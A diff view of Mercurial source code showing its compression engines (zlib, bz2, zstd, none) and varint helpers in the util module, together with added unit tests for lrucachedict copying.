3451 3459 def bundletype(self):
3452 3460 """zlib compression using the DEFLATE algorithm.
3453 3461
3454 3462 All Mercurial clients should support this format. The compression
3455 3463 algorithm strikes a reasonable balance between compression ratio
3456 3464 and size.
3457 3465 """
3458 3466 return 'gzip', 'GZ'
3459 3467
3460 3468 def wireprotosupport(self):
3461 3469 return compewireprotosupport('zlib', 20, 20)
3462 3470
3463 3471 def revlogheader(self):
3464 3472 return 'x'
3465 3473
3466 3474 def compressstream(self, it, opts=None):
3467 3475 opts = opts or {}
3468 3476
3469 3477 z = zlib.compressobj(opts.get('level', -1))
3470 3478 for chunk in it:
3471 3479 data = z.compress(chunk)
3472 3480 # Not all calls to compress emit data. It is cheaper to inspect
3473 3481 # here than to feed empty chunks through the generator.
3474 3482 if data:
3475 3483 yield data
3476 3484
3477 3485 yield z.flush()
3478 3486
3479 3487 def decompressorreader(self, fh):
3480 3488 return _GzipCompressedStreamReader(fh)
3481 3489
3482 3490 class zlibrevlogcompressor(object):
3483 3491 def compress(self, data):
3484 3492 insize = len(data)
3485 3493 # Caller handles empty input case.
3486 3494 assert insize > 0
3487 3495
3488 3496 if insize < 44:
3489 3497 return None
3490 3498
3491 3499 elif insize <= 1000000:
3492 3500 compressed = zlib.compress(data)
3493 3501 if len(compressed) < insize:
3494 3502 return compressed
3495 3503 return None
3496 3504
3497 3505 # zlib makes an internal copy of the input buffer, doubling
3498 3506 # memory usage for large inputs. So do streaming compression
3499 3507 # on large inputs.
3500 3508 else:
3501 3509 z = zlib.compressobj()
3502 3510 parts = []
3503 3511 pos = 0
3504 3512 while pos < insize:
3505 3513 pos2 = pos + 2**20
3506 3514 parts.append(z.compress(data[pos:pos2]))
3507 3515 pos = pos2
3508 3516 parts.append(z.flush())
3509 3517
3510 3518 if sum(map(len, parts)) < insize:
3511 3519 return ''.join(parts)
3512 3520 return None
3513 3521
3514 3522 def decompress(self, data):
3515 3523 try:
3516 3524 return zlib.decompress(data)
3517 3525 except zlib.error as e:
3518 3526 raise error.RevlogError(_('revlog decompress error: %s') %
3519 3527 stringutil.forcebytestr(e))
3520 3528
3521 3529 def revlogcompressor(self, opts=None):
3522 3530 return self.zlibrevlogcompressor()
3523 3531
3524 3532 compengines.register(_zlibengine())
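
# Hedged round-trip sketch for the engine just registered (hypothetical
# helper; bytes string semantics as elsewhere in this file):
def _example_zlib_roundtrip():
    engine = _zlibengine()
    blob = b''.join(engine.compressstream(iter([b'hello ', b'world'])))
    reader = engine.decompressorreader(pycompat.bytesio(blob))
    assert reader.read(11) == b'hello world'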
3525 3533
3526 3534 class _bz2engine(compressionengine):
3527 3535 def name(self):
3528 3536 return 'bz2'
3529 3537
3530 3538 def bundletype(self):
3531 3539 """An algorithm that produces smaller bundles than ``gzip``.
3532 3540
3533 3541 All Mercurial clients should support this format.
3534 3542
3535 3543 This engine will likely produce smaller bundles than ``gzip`` but
3536 3544 will be significantly slower, both during compression and
3537 3545 decompression.
3538 3546
3539 3547 If available, the ``zstd`` engine can yield similar or better
3540 3548 compression at much higher speeds.
3541 3549 """
3542 3550 return 'bzip2', 'BZ'
3543 3551
3544 3552 # We declare a protocol name but don't advertise by default because
3545 3553 # it is slow.
3546 3554 def wireprotosupport(self):
3547 3555 return compewireprotosupport('bzip2', 0, 0)
3548 3556
3549 3557 def compressstream(self, it, opts=None):
3550 3558 opts = opts or {}
3551 3559 z = bz2.BZ2Compressor(opts.get('level', 9))
3552 3560 for chunk in it:
3553 3561 data = z.compress(chunk)
3554 3562 if data:
3555 3563 yield data
3556 3564
3557 3565 yield z.flush()
3558 3566
3559 3567 def decompressorreader(self, fh):
3560 3568 return _BZ2CompressedStreamReader(fh)
3561 3569
3562 3570 compengines.register(_bz2engine())
3563 3571
3564 3572 class _truncatedbz2engine(compressionengine):
3565 3573 def name(self):
3566 3574 return 'bz2truncated'
3567 3575
3568 3576 def bundletype(self):
3569 3577 return None, '_truncatedBZ'
3570 3578
3571 3579 # We don't implement compressstream because it is hackily handled elsewhere.
3572 3580
3573 3581 def decompressorreader(self, fh):
3574 3582 return _TruncatedBZ2CompressedStreamReader(fh)
3575 3583
3576 3584 compengines.register(_truncatedbz2engine())
3577 3585
3578 3586 class _noopengine(compressionengine):
3579 3587 def name(self):
3580 3588 return 'none'
3581 3589
3582 3590 def bundletype(self):
3583 3591 """No compression is performed.
3584 3592
3585 3593 Use this compression engine to explicitly disable compression.
3586 3594 """
3587 3595 return 'none', 'UN'
3588 3596
3589 3597 # Clients always support uncompressed payloads. Servers don't advertise
3590 3598 # it by default because, unless you are on a fast network, uncompressed
3591 3599 # payloads can easily saturate your network pipe.
3592 3600 def wireprotosupport(self):
3593 3601 return compewireprotosupport('none', 0, 10)
3594 3602
3595 3603 # We don't implement revlogheader because it is handled specially
3596 3604 # in the revlog class.
3597 3605
3598 3606 def compressstream(self, it, opts=None):
3599 3607 return it
3600 3608
3601 3609 def decompressorreader(self, fh):
3602 3610 return fh
3603 3611
3604 3612 class nooprevlogcompressor(object):
3605 3613 def compress(self, data):
3606 3614 return None
3607 3615
3608 3616 def revlogcompressor(self, opts=None):
3609 3617 return self.nooprevlogcompressor()
3610 3618
3611 3619 compengines.register(_noopengine())
3612 3620
3613 3621 class _zstdengine(compressionengine):
3614 3622 def name(self):
3615 3623 return 'zstd'
3616 3624
3617 3625 @propertycache
3618 3626 def _module(self):
3619 3627 # Not all installs have the zstd module available. So defer importing
3620 3628 # until first access.
3621 3629 try:
3622 3630 from . import zstd
3623 3631 # Force delayed import.
3624 3632 zstd.__version__
3625 3633 return zstd
3626 3634 except ImportError:
3627 3635 return None
3628 3636
3629 3637 def available(self):
3630 3638 return bool(self._module)
3631 3639
3632 3640 def bundletype(self):
3633 3641 """A modern compression algorithm that is fast and highly flexible.
3634 3642
3635 3643 Only supported by Mercurial 4.1 and newer clients.
3636 3644
3637 3645 With the default settings, zstd compression is both faster and yields
3638 3646 better compression than ``gzip``. It also frequently yields better
3639 3647 compression than ``bzip2`` while operating at much higher speeds.
3640 3648
3641 3649 If this engine is available and backwards compatibility is not a
3642 3650 concern, it is likely the best available engine.
3643 3651 """
3644 3652 return 'zstd', 'ZS'
3645 3653
3646 3654 def wireprotosupport(self):
3647 3655 return compewireprotosupport('zstd', 50, 50)
3648 3656
3649 3657 def revlogheader(self):
3650 3658 return '\x28'
3651 3659
3652 3660 def compressstream(self, it, opts=None):
3653 3661 opts = opts or {}
3654 3662 # zstd level 3 is almost always significantly faster than zlib
3655 3663 # while providing no worse compression. It strikes a good balance
3656 3664 # between speed and compression.
3657 3665 level = opts.get('level', 3)
3658 3666
3659 3667 zstd = self._module
3660 3668 z = zstd.ZstdCompressor(level=level).compressobj()
3661 3669 for chunk in it:
3662 3670 data = z.compress(chunk)
3663 3671 if data:
3664 3672 yield data
3665 3673
3666 3674 yield z.flush()
3667 3675
3668 3676 def decompressorreader(self, fh):
3669 3677 return _ZstdCompressedStreamReader(fh, self._module)
3670 3678
3671 3679 class zstdrevlogcompressor(object):
3672 3680 def __init__(self, zstd, level=3):
3673 3681 # TODO consider omitting frame magic to save 4 bytes.
3674 3682 # This writes content sizes into the frame header. That is
3675 3683 # extra storage. But it allows a correctly sized memory allocation
3676 3684 # to hold the result.
3677 3685 self._cctx = zstd.ZstdCompressor(level=level)
3678 3686 self._dctx = zstd.ZstdDecompressor()
3679 3687 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3680 3688 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3681 3689
3682 3690 def compress(self, data):
3683 3691 insize = len(data)
3684 3692 # Caller handles empty input case.
3685 3693 assert insize > 0
3686 3694
3687 3695 if insize < 50:
3688 3696 return None
3689 3697
3690 3698 elif insize <= 1000000:
3691 3699 compressed = self._cctx.compress(data)
3692 3700 if len(compressed) < insize:
3693 3701 return compressed
3694 3702 return None
3695 3703 else:
3696 3704 z = self._cctx.compressobj()
3697 3705 chunks = []
3698 3706 pos = 0
3699 3707 while pos < insize:
3700 3708 pos2 = pos + self._compinsize
3701 3709 chunk = z.compress(data[pos:pos2])
3702 3710 if chunk:
3703 3711 chunks.append(chunk)
3704 3712 pos = pos2
3705 3713 chunks.append(z.flush())
3706 3714
3707 3715 if sum(map(len, chunks)) < insize:
3708 3716 return ''.join(chunks)
3709 3717 return None
3710 3718
3711 3719 def decompress(self, data):
3712 3720 insize = len(data)
3713 3721
3714 3722 try:
3715 3723 # This was measured to be faster than other streaming
3716 3724 # decompressors.
3717 3725 dobj = self._dctx.decompressobj()
3718 3726 chunks = []
3719 3727 pos = 0
3720 3728 while pos < insize:
3721 3729 pos2 = pos + self._decompinsize
3722 3730 chunk = dobj.decompress(data[pos:pos2])
3723 3731 if chunk:
3724 3732 chunks.append(chunk)
3725 3733 pos = pos2
3726 3734 # Frame should be exhausted, so no finish() API.
3727 3735
3728 3736 return ''.join(chunks)
3729 3737 except Exception as e:
3730 3738 raise error.RevlogError(_('revlog decompress error: %s') %
3731 3739 stringutil.forcebytestr(e))
3732 3740
3733 3741 def revlogcompressor(self, opts=None):
3734 3742 opts = opts or {}
3735 3743 return self.zstdrevlogcompressor(self._module,
3736 3744 level=opts.get('level', 3))
3737 3745
3738 3746 compengines.register(_zstdengine())
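
# Hedged sketch (hypothetical helper): zstd is optional, so callers are
# expected to check available() before relying on this engine.
def _example_zstd_guarded():
    engine = _zstdengine()
    if not engine.available():
        return None
    return b''.join(engine.compressstream(iter([b'data']), {'level': 3}))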
3739 3747
3740 3748 def bundlecompressiontopics():
3741 3749 """Obtains a list of available bundle compressions for use in help."""
3742 3750 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3743 3751 items = {}
3744 3752
3745 3753 # We need to format the docstring. So use a dummy object/type to hold it
3746 3754 # rather than mutating the original.
3747 3755 class docobject(object):
3748 3756 pass
3749 3757
3750 3758 for name in compengines:
3751 3759 engine = compengines[name]
3752 3760
3753 3761 if not engine.available():
3754 3762 continue
3755 3763
3756 3764 bt = engine.bundletype()
3757 3765 if not bt or not bt[0]:
3758 3766 continue
3759 3767
3760 3768 doc = pycompat.sysstr('``%s``\n %s') % (
3761 3769 bt[0], engine.bundletype.__doc__)
3762 3770
3763 3771 value = docobject()
3764 3772 value.__doc__ = doc
3765 3773 value._origdoc = engine.bundletype.__doc__
3766 3774 value._origfunc = engine.bundletype
3767 3775
3768 3776 items[bt[0]] = value
3769 3777
3770 3778 return items
3771 3779
3772 3780 i18nfunctions = bundlecompressiontopics().values()
3773 3781
3774 3782 # convenient shortcut
3775 3783 dst = debugstacktrace
3776 3784
3777 3785 def safename(f, tag, ctx, others=None):
3778 3786 """
3779 3787 Generate a name that is safe to rename f to in the given context.
3780 3788
3781 3789 f: filename to rename
3782 3790 tag: a string tag that will be included in the new name
3783 3791 ctx: a context, in which the new name must not exist
3784 3792 others: a set of other filenames that the new name must not be in
3785 3793
3786 3794 Returns a file name of the form oldname~tag[~number] which does not exist
3787 3795 in the provided context and is not in the set of other names.
3788 3796 """
3789 3797 if others is None:
3790 3798 others = set()
3791 3799
3792 3800 fn = '%s~%s' % (f, tag)
3793 3801 if fn not in ctx and fn not in others:
3794 3802 return fn
3795 3803 for n in itertools.count(1):
3796 3804 fn = '%s~%s~%s' % (f, tag, n)
3797 3805 if fn not in ctx and fn not in others:
3798 3806 return fn
3799 3807
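# Hedged sketch: ``ctx`` is only used for membership tests above, so a
# plain set can stand in for a real changectx in this illustration.
def _example_safename():
    ctx = {'f.txt', 'f.txt~orig'}
    assert safename('f.txt', 'orig', ctx) == 'f.txt~orig~1'
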
3800 3808 def readexactly(stream, n):
3801 3809 '''read n bytes from stream.read and abort if less was available'''
3802 3810 s = stream.read(n)
3803 3811 if len(s) < n:
3804 3812 raise error.Abort(_("stream ended unexpectedly"
3805 3813 " (got %d bytes, expected %d)")
3806 3814 % (len(s), n))
3807 3815 return s
3808 3816
3809 3817 def uvarintencode(value):
3810 3818 """Encode an unsigned integer value to a varint.
3811 3819
3812 3820 A varint is a variable length integer of 1 or more bytes. Each byte
3813 3821 except the last has the most significant bit set. The lower 7 bits of
3814 3822 each byte store the integer's binary representation, least significant group
3815 3823 first.
3816 3824
3817 3825 >>> uvarintencode(0)
3818 3826 '\\x00'
3819 3827 >>> uvarintencode(1)
3820 3828 '\\x01'
3821 3829 >>> uvarintencode(127)
3822 3830 '\\x7f'
3823 3831 >>> uvarintencode(1337)
3824 3832 '\\xb9\\n'
3825 3833 >>> uvarintencode(65536)
3826 3834 '\\x80\\x80\\x04'
3827 3835 >>> uvarintencode(-1)
3828 3836 Traceback (most recent call last):
3829 3837 ...
3830 3838 ProgrammingError: negative value for uvarint: -1
3831 3839 """
3832 3840 if value < 0:
3833 3841 raise error.ProgrammingError('negative value for uvarint: %d'
3834 3842 % value)
3835 3843 bits = value & 0x7f
3836 3844 value >>= 7
3837 3845 bytes = []
3838 3846 while value:
3839 3847 bytes.append(pycompat.bytechr(0x80 | bits))
3840 3848 bits = value & 0x7f
3841 3849 value >>= 7
3842 3850 bytes.append(pycompat.bytechr(bits))
3843 3851
3844 3852 return ''.join(bytes)
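
# Worked example for the doctests above: 1337 is 0b101_0011_1001. The low
# seven bits, 0111001 (0x39), are emitted first with the continuation bit
# set (0x39 | 0x80 = 0xb9); the remainder, 1337 >> 7 = 10 (0x0a, '\n'),
# follows without it, giving '\xb9\n'.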
3845 3853
3846 3854 def uvarintdecodestream(fh):
3847 3855 """Decode an unsigned variable length integer from a stream.
3848 3856
3849 3857 The passed argument is anything that has a ``.read(N)`` method.
3850 3858
3851 3859 >>> try:
3852 3860 ... from StringIO import StringIO as BytesIO
3853 3861 ... except ImportError:
3854 3862 ... from io import BytesIO
3855 3863 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3856 3864 0
3857 3865 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3858 3866 1
3859 3867 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3860 3868 127
3861 3869 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3862 3870 1337
3863 3871 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3864 3872 65536
3865 3873 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3866 3874 Traceback (most recent call last):
3867 3875 ...
3868 3876 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3869 3877 """
3870 3878 result = 0
3871 3879 shift = 0
3872 3880 while True:
3873 3881 byte = ord(readexactly(fh, 1))
3874 3882 result |= ((byte & 0x7f) << shift)
3875 3883 if not (byte & 0x80):
3876 3884 return result
3877 3885 shift += 7
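
# Hedged round-trip sketch tying the varint codec together (hypothetical
# helper; bytes string semantics as elsewhere in this file):
def _example_uvarint_roundtrip():
    for value in (0, 1, 127, 1337, 65536):
        fh = pycompat.bytesio(uvarintencode(value))
        assert uvarintdecodestream(fh) == value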
@@ -1,105 +1,121 @@
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 d['a'] = 'va'
15 15 d['b'] = 'vb'
16 16 d['c'] = 'vc'
17 17 d['d'] = 'vd'
18 18
19 19 self.assertEqual(d['a'], 'va')
20 20 self.assertEqual(d['b'], 'vb')
21 21 self.assertEqual(d['c'], 'vc')
22 22 self.assertEqual(d['d'], 'vd')
23 23
24 24 # 'a' should be dropped because it was least recently used.
25 25 d['e'] = 've'
26 26 self.assertNotIn('a', d)
27 27
28 28 self.assertIsNone(d.get('a'))
29 29
30 30 self.assertEqual(d['b'], 'vb')
31 31 self.assertEqual(d['c'], 'vc')
32 32 self.assertEqual(d['d'], 'vd')
33 33 self.assertEqual(d['e'], 've')
34 34
35 35 # Touch entries in some order (both get and set).
36 36 d['e']
37 37 d['c'] = 'vc2'
38 38 d['d']
39 39 d['b'] = 'vb2'
40 40
41 41 # 'e' should be dropped now
42 42 d['f'] = 'vf'
43 43 self.assertNotIn('e', d)
44 44 self.assertEqual(d['b'], 'vb2')
45 45 self.assertEqual(d['c'], 'vc2')
46 46 self.assertEqual(d['d'], 'vd')
47 47 self.assertEqual(d['f'], 'vf')
48 48
49 49 d.clear()
50 50 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
51 51 self.assertNotIn(key, d)
52 52
53 53 def testunfull(self):
54 54 d = util.lrucachedict(4)
55 55 d['a'] = 1
56 56 d['b'] = 2
57 57 d['a']
58 58 d['b']
59 59
60 60 for key in ('a', 'b'):
61 61 self.assertIn(key, d)
62 62
63 63 def testcopypartial(self):
64 64 d = util.lrucachedict(4)
65 65 d['a'] = 'va'
66 66 d['b'] = 'vb'
67 67
68 68 dc = d.copy()
69 69
70 70 self.assertEqual(len(dc), 2)
71 # TODO this fails
72 return
73 71 for key in ('a', 'b'):
74 72 self.assertIn(key, dc)
75 73 self.assertEqual(dc[key], 'v%s' % key)
76 74
75 self.assertEqual(len(d), 2)
76 for key in ('a', 'b'):
77 self.assertIn(key, d)
78 self.assertEqual(d[key], 'v%s' % key)
79
80 d['c'] = 'vc'
81 del d['b']
82 dc = d.copy()
83 self.assertEqual(len(dc), 2)
84 for key in ('a', 'c'):
85 self.assertIn(key, dc)
86 self.assertEqual(dc[key], 'v%s' % key)
87
88 def testcopyempty(self):
89 d = util.lrucachedict(4)
90 dc = d.copy()
91 self.assertEqual(len(dc), 0)
92
77 93 def testcopyfull(self):
78 94 d = util.lrucachedict(4)
79 95 d['a'] = 'va'
80 96 d['b'] = 'vb'
81 97 d['c'] = 'vc'
82 98 d['d'] = 'vd'
83 99
84 100 dc = d.copy()
85 101
86 102 for key in ('a', 'b', 'c', 'd'):
87 103 self.assertIn(key, dc)
88 104 self.assertEqual(dc[key], 'v%s' % key)
89 105
90 106 # 'a' should be dropped because it was least recently used.
91 107 dc['e'] = 've'
92 108 self.assertNotIn('a', dc)
93 109 for key in ('b', 'c', 'd', 'e'):
94 110 self.assertIn(key, dc)
95 111 self.assertEqual(dc[key], 'v%s' % key)
96 112
97 113 # Contents and order of original dict should remain unchanged.
98 114 dc['b'] = 'vb_new'
99 115
100 116 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
101 117 for key in ('a', 'b', 'c', 'd'):
102 118 self.assertEqual(d[key], 'v%s' % key)
103 119
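# A hedged sketch (hypothetical helper) of the invariant these tests pin
# down: iteration walks entries from most to least recently used, and
# copy() must preserve contents and order independently of later
# mutation of the copy.
def _example_copy_independence():
    d = util.lrucachedict(4)
    for k in ('a', 'b', 'c'):
        d[k] = 'v%s' % k
    dc = d.copy()
    dc['d'] = 'vd'
    assert list(iter(d)) == ['c', 'b', 'a']
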
104 120 if __name__ == '__main__':
105 121 silenttestrunner.main(__name__)